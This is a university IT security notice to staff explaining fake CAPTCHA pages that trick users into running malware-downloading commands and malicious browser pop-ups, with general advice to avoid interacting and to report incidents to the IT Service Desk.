As cyber threats continue to evolve, we want to bring to your attention to some significant changes in attack methods and provide guidance on how to best protect yourself and BU.
Fake CAPTCHA authentications
What is a CAPTCHA?
Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a type of challenge-response test (usually a tick box) used to determine whether a user is human or not.
What is the attack?
The attack starts when a user accesses a compromised website. A fake CAPTCHA appears and requests the user prove they are human by completing a task. Normally, this involves selecting images that contain a specific item, but in this case the CAPTCHA gives the user a series of key combinations to type on their keyboard as "verification steps".
These key combinations are actually using keyboard shortcuts to copy and run malicious commands on the computer, but this is all hidden from the user's view. The compromised website loads a background image which prevents users from seeing what is actually going on. The command downloads and runs a malicious file from the internet installing malware (malicious software) on to the user's device.
How to stay safe?
If you come across a CAPTCHA which asks you to copy and paste a command into your computer, do not do this under any circumstance and cease interactions with the webpage. This is not a legitimate part of a genuine CAPTCHA check. It is a tactic used by cyber-criminals to gain access to your personal, financial and/or sensitive information. If you come across a CAPTCHA check like this, please report it to the IT Service Desk immediately.
Malicious pop-ups
Malicious popups are deceptive notification messages which can appear on your desktop when browsing compromised websites. They typically use scare tactics to entice a user to click on or interact with the popup. Common popups impersonate urgent alerts from well-known computer security companies like McAfee and Norton. The popups normally state that viruses have been detected on the device, or a malicious connection has been made to the device. ‘Buttons’ appear encouraging the user to click them to mitigate the threats.
Unfortunately, despite the rise in the prevalence of these pop-ups, staff often choose not to report them for investigation which needs to change.
What is the attack?
When browsing compromised websites, the user will be asked to give the website permission to carry out certain actions in the browser. We are used to giving permission for our browser to have access to the camera and microphone for platforms like Zoom and Teams, and compromised sites will abuse this familiarity and request permissions to display popups and notifications, carry out redirects and run JavaScript’s from the site.
Once these permissions have been granted, popup notifications can be sent to the computer, and the browser can be redirected to malicious sites. The malicious popups are the first step of an attack and can download and run malware on to your device if the pop-up is clicked.
Malware can spread throughout the BU network placing all our data at risk of theft, ransom and sabotage.
How to stay safe if you encounter a pop-up:
- Do not click on the popup
- Do not call the number of the pop-up if there is one
- Do not give out personal details or payment details
- Either take pictures of the popups or leave the popups on screen and call the IT Service Desk immediately. The popups contain information that can be used to protect BU staff and devices from further attack.
Most importantly, report this to the IT Service Desk.
Report, report, report! Information security is everyone’s responsibility, and we’d prefer you to report something you are unsure of for investigation rather than choosing to do nothing at all.
Report non-urgent security incidents or concerns via the IT Self Service Portal. For urgent matters including data breach, account compromise, or computer virus call (01202 9)65515 or freephone 0808 196 2332.